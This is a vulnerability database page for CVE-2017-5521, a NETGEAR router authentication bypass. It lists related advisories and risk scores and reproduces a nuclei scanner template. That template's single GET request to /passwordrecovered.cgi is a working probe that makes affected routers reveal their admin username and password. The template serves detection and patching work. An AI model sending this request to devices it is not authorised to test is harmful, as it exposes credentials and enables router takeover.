Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NETGEAR Routers - Authentication Bypass

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 29 Views

NETGEAR Routers - Authentication Bypass vulnerability on various router models. Unauthorized configuration changes and potential exposure of sensitive information. Apply latest firmware update to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Netgear Routers - Password Disclosure Vulnerabilities
30 Jan 201700:00
zdt
ATTACKERKB		CVE-2017-5521
17 Jan 201700:00
attackerkb
BDU FSTEC		The vulnerability in the built-in software of NETGEAR routers such as NETGEAR R8500, NETGEAR R8300, NETGEAR R7000, NETGEAR R6400, NETGEAR R7300DST, NETGEAR R7100LG, NETGEAR R6300v2, NETGEAR WNDR3400v3, NETGEAR WNDR3500Lv2, NETGEAR R6250, NETGEAR R6700, NETGEAR R6900, NETGEAR R8000, NETGEAR R7900, NETGEAR WNDR4500v2, NETGEAR R6200v2, NETGEAR WNDR3400v2, NETGEAR D6220, NETGEAR D6400, NETGEAR C6300, NETGEAR R6200, NETGEAR R6300, NETGEAR VENG2610, NETGEAR AC1450, NETGEAR WNDR1000v3, NETGEAR WNDR3700v3, NETGEAR WNDR4000, NETGEAR WNDR4500, NETGEAR D6300, NETGEAR D6300B, NETGEAR DGN2200Bv4, and NETGEAR DGN2200v4, allows a hacker to obtain user password information.
2 Feb 201700:00
bdu_fstec
Circl		CVE-2017-5521
30 Jan 201700:00
circl
CISA KEV Catalog		NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability
8 Sep 202200:00
cisa_kev
CNVD		Multiple NETGEAR routers are vulnerable to administrator password information leaks
3 Feb 201700:00
cnvd
Check Point Advisories		NETGEAR Routers Authentication Bypass (CVE-2017-5521)
7 Feb 201700:00
checkpoint_advisories
Check Point Advisories		NETGEAR DGN2200 Remote Code Execution (CVE-2017-5521; CVE-2017-6077)
24 May 201800:00
checkpoint_advisories
CVE		CVE-2017-5521
17 Jan 201709:22
cve
Cvelist		CVE-2017-5521
17 Jan 201709:22
cvelist
Rows per page
id: CVE-2017-5521

info:
  name: NETGEAR Routers - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
    - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
    - https://www.exploit-db.com/exploits/41205/
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
    epss-score: 0.89294
    epss-percentile: 0.99765
    cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: r6200_firmware
  tags: cve,cve2017,auth-bypass,netgear,router,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098eacb173b0a289e383a183f64c917c6215f03caf6e649a5836090d89c791824022100b59584c55bec9a33dc45606adb8be586680fa29383463897e0973d90db5cb521:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 24.3
CVSS 3.18.1
EPSS0.89294
SSVC
cve2017authenticationbypassnetgearrouter
29